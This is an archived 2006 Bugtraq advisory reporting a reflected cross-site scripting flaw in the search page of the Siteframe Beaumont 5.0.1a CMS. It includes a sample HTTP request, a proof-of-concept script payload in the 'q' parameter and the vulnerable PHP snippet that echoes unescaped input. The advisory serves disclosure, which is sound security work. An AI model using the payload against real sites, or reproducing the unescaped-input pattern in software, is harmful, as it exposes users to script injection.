lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 12 Feb 2006 18:46:26 -0000 From: federico.alice@...cali.it To: bugtraq@...urityfocus.com Subject: Siteframe Beaumont 5.0.1a <== Cross-Site Scripting Vulnerability Hi, I'm Kiki and I would signal you a XSS in the CMS Siteframe Beaumont 5.0.1a I enclose the advisory and the origina is here: http://kiki91.altervista.org/exploit/siteframe5.0.1a_xss.txt Bye bye Kiki p.s: sorry for my bad English but I'm Italian ;) Advisory: Siteframe Beaumont 5.0.1a <== Cross-Site Scripting Vulnerability ########################## Information of Software: Software: Siteframe Beaumont 5.0.1a Site: http://www.siteframe.org/ Description of software: Siteframe is a lightweight content-management system designed for the rapid deployment of community-based websites. With Siteframe,a group of users can share stories and photographs, create blogs, send email to one another, and participate in group activities. ########################## Bug: Siteframe contains a flaw that allows a remote cross site scripting attack. The vulnerability is found in the search page and the user can modify the function GET and insert the XSS code. - http get request http://[target]/search.php?q=casa GET /search.php?q=casa Host: siteframe.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive but we can modify the request GET in this way: http://[target]/search.php?q=[XSS] GET /search.php?q=[XSS] ------------------------- Example: http://[target]/search.php?q=[XSS] or a practical example: http://[target]/search.php?q=<script>alert("lol");</script> ------------------------- The bug is in this part of code of search.php : [.....] if (isset($_GET['q'])) { $PAGE->assign('page_title', lang('page_title_search_results')); $pattern = $_GET['q']; $PAGE->assign('search_string', $_GET['q']); // build query $stext = new SearchText; $q = sprintf( $__QUERY, addslashes($_GET['q']), $stext->table_name(), addslashes($_GET['q']) ); $PAGE->assign('sql_query', $q); [.....] ########################## Credit: Author: Kiki e-mail: federico.sana@...ce.it web page: http://www.kiki91.altervista.org ##########################
Powered by blists - more mailing lists